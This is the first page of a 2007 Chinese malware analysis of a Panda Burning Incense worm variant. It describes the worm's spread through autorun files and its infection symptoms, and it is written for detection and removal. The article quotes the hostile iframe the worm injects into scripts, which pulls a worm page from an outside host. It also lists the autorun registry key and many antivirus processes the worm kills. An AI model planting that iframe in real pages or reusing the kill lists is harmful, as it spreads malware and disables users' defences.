熊猫烧香最新变种分析及查杀

来源：互联安全网 作者： 出处：巧巧读书 2007-01-22 进入讨论组

• 关 键 词：
• msconfig.exe
• microsoft
• frontpage
• explorer
• symantec

下一页 1 2 3 

文件名称：nvscv32.exe

病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商）

中文名称：（尼姆亚，熊猫烧香）

病毒大小：68,570 字节

编写语言：Borland Delphi 6.0 - 7.0

加壳方式：FSG 2.0 -> bart/xt

发现时间：2007.1.16

危害等级：高

一、病毒描述：

含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。

二：中毒现象：

1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。

2：无法手工修改“文件夹选项”将隐藏文件显示出来。

3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16

4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

6：不能正常使用任务管理器，SREng.exe等工具。

7：无故的向外发包，连接局域网中其他机器。

三：技术分析

1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe

建立注册表自启动项:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

2：查找反病毒窗体病毒结束相关进程:

天网防火墙

virusscan

symantec antivirus

system safety monitor

system repair engineer

wrapped gift killer

游戏木马检测大师

超级巡警

3：结束以下进程:

mcshield.exe

vstskmgr.exe

naprdmgr.exe

updaterui.exe

tbmon.exe

scan32.exe

ravmond.exe

ccenter.exe

ravtask.exe

rav.exe

ravmon.exe

ravmond.exe

ravstub.exe

kvxp.kxp

kvmonxp.kxp

kvcenter.kxp

kvsrvxp.exe

kregex.exe

uihost.exe

trojdie.kxp

frogagent.exe

kvxp.kxp

kvmonxp.kxp

kvcenter.kxp

kvsrvxp.exe

kregex.exe

uihost.exe

trojdie.kxp

frogagent.exe

logo1_.exe

logo_1.exe

rundl132.exe

taskmgr.exe

msconfig.exe

regedit.exe

sreng.exe浏览地址： http://www.qqread.com/virus/a294283.html 更多内容请看警惕“熊猫烧香”疯狂蔓延：熊猫烧香病毒防杀方法、熊猫、熊猫烧香查杀方法专题，或进入讨论组讨论。

下一页 1 2 3 

【收藏此文】【大 中 小】【打印】【关闭】

较早的文章：“熊猫烧香”病毒的病毒描述和发作行为

较新的文章：决战熊猫烧香 各大厂商专杀工具一览